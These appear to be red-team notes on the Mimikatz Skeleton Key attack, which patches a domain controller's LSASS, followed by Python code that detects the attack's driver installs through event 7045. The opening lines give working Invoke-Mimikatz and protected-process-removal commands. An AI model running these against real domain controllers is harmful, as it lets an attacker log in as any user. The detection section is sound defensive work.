- Patches the DC’s LSASS process so that it allows access as any user with a single password.
- Publicly known methods are not persistent across reboots.

Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName domain-controller-fqdn

Enter-PSSession -ComputerName domain-controller -credential domain\Administrator

In case LSASS is running as a protected process, we can still use the Skeleton Key, but it needs the mimikatz driver (mimidrv.sys) on the disk of the target DC:

mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # misc::skeleton

- Very noisy in the logs: service installation (kernel-mode driver)
- Might cause issues with AD CS
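
The kernel-mode driver service installation noted above is recorded by the Service Control Manager as System event 7045. The following is an added example, not part of the original notes, that flags such events in XML exported from a DC; the sample events, the host name and the driver-directory baseline are constructed assumptions.

```python
import ntpath
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
DRIVER_DIR = "c:\\windows\\system32\\drivers\\"  # assumption: default Windows layout

def normalize(path):
    """Lower-case an ImagePath and expand the prefixes seen in 7045 events."""
    p = path.strip().strip('"').lower()
    if p.startswith("\\??\\"):
        p = p[4:]
    if p.startswith("\\systemroot\\"):
        p = "c:\\windows\\" + p[len("\\systemroot\\"):]
    elif p.startswith("system32\\"):
        p = "c:\\windows\\" + p
    return ntpath.normpath(p)  # also collapses ..\ segments

def suspicious_driver_installs(xml_text):
    """Return (computer, service, path, reasons) for each flagged 7045 event."""
    findings = []
    for ev in ET.fromstring(xml_text).findall("e:Event", NS):
        if ev.findtext("e:System/e:EventID", "", NS).strip() != "7045":
            continue
        data = {d.get("Name"): d.text or "" for d in ev.findall("e:EventData/e:Data", NS)}
        if data.get("ServiceType", "").lower() != "kernel mode driver":
            continue
        path = normalize(data.get("ImagePath", ""))
        reasons = []
        if not path.startswith(DRIVER_DIR):
            reasons.append("driver outside system32\\drivers")
        if "mimidrv" in path or "mimidrv" in data.get("ServiceName", "").lower():
            reasons.append("mimikatz driver name")
        if reasons:
            host = ev.findtext("e:System/e:Computer", "", NS)
            findings.append((host, data.get("ServiceName"), path, reasons))
    return findings

def _ev(eid, name, path, stype):  # builds one constructed event record
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{eid}</EventID>'
            f'<Computer>dc01.example.test</Computer></System><EventData>'
            f'<Data Name="ServiceName">{name}</Data><Data Name="ImagePath">{path}</Data>'
            f'<Data Name="ServiceType">{stype}</Data></EventData></Event>')

# Constructed sample, not real telemetry; exported events wrapped in one root element.
SAMPLE = "<Events>" + "".join([
    _ev(7045, "mimidrv", r"\??\C:\Users\Public\mimidrv.sys", "kernel mode driver"),
    _ev(7045, "vendornet", r"\SystemRoot\System32\drivers\vendornet.sys", "kernel mode driver"),
    _ev(7045, "BackupAgent", r"C:\Program Files\Backup\agent.exe", "user mode service"),
]) + "</Events>"
```

Calling `suspicious_driver_installs(SAMPLE)` returns only the first event; a renamed driver file still trips the path check, which is why the name match is the weaker of the two signals.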